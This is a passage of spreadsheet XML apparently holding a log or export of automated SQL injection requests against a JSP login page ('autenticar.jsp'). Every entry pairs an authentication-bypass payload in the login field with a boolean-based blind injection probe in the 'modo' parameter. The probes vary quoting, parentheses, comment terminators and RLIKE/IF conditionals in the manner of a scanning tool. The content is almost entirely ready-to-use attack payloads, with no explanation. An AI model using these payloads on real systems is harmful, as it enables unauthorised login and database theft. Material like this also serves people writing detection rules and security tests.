    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and2238=9754#and((3429=3429</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and1396=1396#and((2078=2078</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3985=4514#and((8446=8446</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and9930=2656#and(((2218=2218</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and1396=1396#and(((3588=3588</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and3500=2445#and(((495=495</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand7799=669#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand1396=1396#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand4237=9986#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and9604=6098#and('pmle'='pmle</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1396=1396#and('zfqz'='zfqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5762=9158#and('sywn'='sywn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2143=1012#and(('ehfn'='ehfn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and1396=1396#and(('ztni'='ztni</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and3706=7439#and(('pvkf'='pvkf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and8730=1985#and((('lsia'='lsia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and1396=1396#and((('xxoe'='xxoe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and4436=3868#and((('cinb'='cinb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6684=3236#and'fobx'='fobx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and1396=1396#and'diyy'='diyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3012=3091#and'dgbh'='dgbh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and74=6418#and('dqdo'like'dqdo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1396=1396#and('mqvu'like'mqvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5098=6039#and('qfur'like'qfur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2330=2171#and(('mrau'like'mrau</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and1396=1396#and(('qdsf'like'qdsf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2822=3680#and(('gqxw'like'gqxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and9509=7455#and((('kiex'like'kiex</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and1396=1396#and((('bxym'like'bxym</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and4103=8348#and((('wqyp'like'wqyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and1688=1664#and'ypkj'like'ypkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and1396=1396#and'eisw'like'eisw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and915=6592#and'vqld'like'vqld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8562=4518#and("npkr"="npkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and1396=1396#and("qbih"="qbih</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and4=2236#and("phbr"="phbr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and161=6659#and(("baff"="baff</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and1396=1396#and(("yddc"="yddc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5588=1346#and(("frub"="frub</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8339=1484#and((("lhmz"="lhmz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and1396=1396#and((("ryov"="ryov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and4757=2716#and((("sphh"="sphh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9399=9924#and"dioo"="dioo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and1396=1396#and"kroj"="kroj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and4486=1116#and"jhux"="jhux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and6507=7736#and("fzdj"like"fzdj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and1396=1396#and("rmmf"like"rmmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2566=50#and("yhrg"like"yhrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and4417=9317#and(("dvti"like"dvti</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and1396=1396#and(("iowe"like"iowe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and5723=5923#and(("yjza"like"yjza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and1360=4001#and((("gfun"like"gfun</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and1396=1396#and((("muzp"like"muzp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7670=6821#and((("cyli"like"cyli</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and726=4260#and"onwo"like"onwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and1396=1396#and"ctni"like"ctni</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6057=7473#and"rsyv"like"rsyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-653</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2475)ornot(1274=7796)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2912)ornot(7021=7021)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4333)ornot(9963=2733)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9980</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7096')ornot(1496=4521)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8787')ornot(7021=7021)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8935')ornot(414=1422)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9344</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3523'ornot(9901=1585)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9351'ornot(7021=7021)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7552'ornot(1536=3221)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-293</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6347"ornot(6364=7574)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6629"ornot(7021=7021)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1288"ornot(5948=4228)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-225</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5345)ornot(6219=3506)#and(4915=4915</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-815)ornot(7021=7021)#and(5204=5204</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1987)ornot(3490=3602)#and(1586=1586</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6783</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2763))ornot(4491=2629)#and((4033=4033</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2587))ornot(7021=7021)#and((9553=9553</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-824))ornot(4178=5470)#and((2165=2165</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3099</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3657)))ornot(597=49)#and(((4819=4819</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8903)))ornot(7021=7021)#and(((9466=9466</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2607)))ornot(3651=8674)#and(((5262=5262</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6580</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9212ornot(5495=7124)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4461ornot(7021=7021)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7590ornot(1864=3244)#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2785</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9034')ornot(6760=1969)#and('viam'='viam</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1203')ornot(7021=7021)#and('nlzk'='nlzk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3794')ornot(7297=7029)#and('smdi'='smdi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1988</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9195'))ornot(3948=8165)#and(('ltxn'='ltxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1552'))ornot(7021=7021)#and(('qxbk'='qxbk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1986'))ornot(5466=8098)#and(('fgye'='fgye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7735</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7336')))ornot(4938=9305)#and((('kwkl'='kwkl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-221')))ornot(7021=7021)#and((('atwy'='atwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6487')))ornot(8306=7293)#and((('catp'='catp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9545</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2269'ornot(2541=481)#and'nlbe'='nlbe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9719'ornot(7021=7021)#and'aghq'='aghq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2998'ornot(5758=4020)#and'dcax'='dcax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3915</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5400')ornot(9693=8578)#and('cima'like'cima</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7633')ornot(7021=7021)#and('xcon'like'xcon</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7982')ornot(3978=9148)#and('kgfq'like'kgfq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6506</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7426'))ornot(7684=3365)#and(('uopi'like'uopi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1091'))ornot(7021=7021)#and(('ckeg'like'ckeg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1692'))ornot(4800=9364)#and(('oydw'like'oydw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9332</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6002')))ornot(1037=7603)#and((('xnyu'like'xnyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5650')))ornot(7021=7021)#and((('fmhn'like'fmhn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8763')))ornot(8595=9279)#and((('sxlo'like'sxlo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3257</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2989'ornot(9758=7358)#and'lqkt'like'lqkt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1080'ornot(7021=7021)#and'cajh'like'cajh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1166'ornot(1329=4183)#and'ndes'like'ndes</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5236</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9544")ornot(4206=2695)#and("pmnv"="pmnv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3393")ornot(7021=7021)#and("ydfe"="ydfe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7462")ornot(686=4662)#and("lubc"="lubc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2380</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6254"))ornot(6172=1575)#and(("pfei"="pfei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9018"))ornot(7021=7021)#and(("ykkl"="ykkl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-255"))ornot(8192=2468)#and(("atxk"="atxk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4665</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7715")))ornot(2714=1380)#and((("bprs"="bprs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3638")))ornot(7021=7021)#and((("qswx"="qswx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8083")))ornot(6902=5578)#and((("hhcr"="hhcr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2036</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9500"ornot(969=4094)#and"scqh"="scqh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3857"ornot(7021=7021)#and"zopm"="zopm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-536"ornot(4620=4315)#and"twah"="twah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8596</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3911")ornot(2628=9305)#and("kpyq"like"kpyq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8849")ornot(7021=7021)#and("qlqe"like"qlqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4505")ornot(8217=6414)#and("zozp"like"zozp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7499</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3730"))ornot(230=7656)#and(("runo"like"runo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1155"))ornot(7021=7021)#and(("qsvd"like"qsvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5487"))ornot(4024=9659)#and(("qltk"like"qltk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3042</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7549")))ornot(517=603)#and((("bhqe"like"bhqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2419")))ornot(7021=7021)#and((("cdfc"like"cdfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5242")))ornot(6095=5011)#and((("zvzz"like"zvzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-560</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5361"ornot(5182=2218)#and"pjvu"like"pjvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4410"ornot(7021=7021)#and"enrl"like"enrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1231"ornot(4286=8229)#and"thmj"like"thmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(1068=1068,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(3924=3924,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)rlikeif(3740=3740,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(8216=8216,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(3924=3924,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')rlikeif(8471=8471,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(1162=1162,entrar,0x28)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'rlikeif(3924=3924,entrar,0x28)</t>
  </si>
  <si>
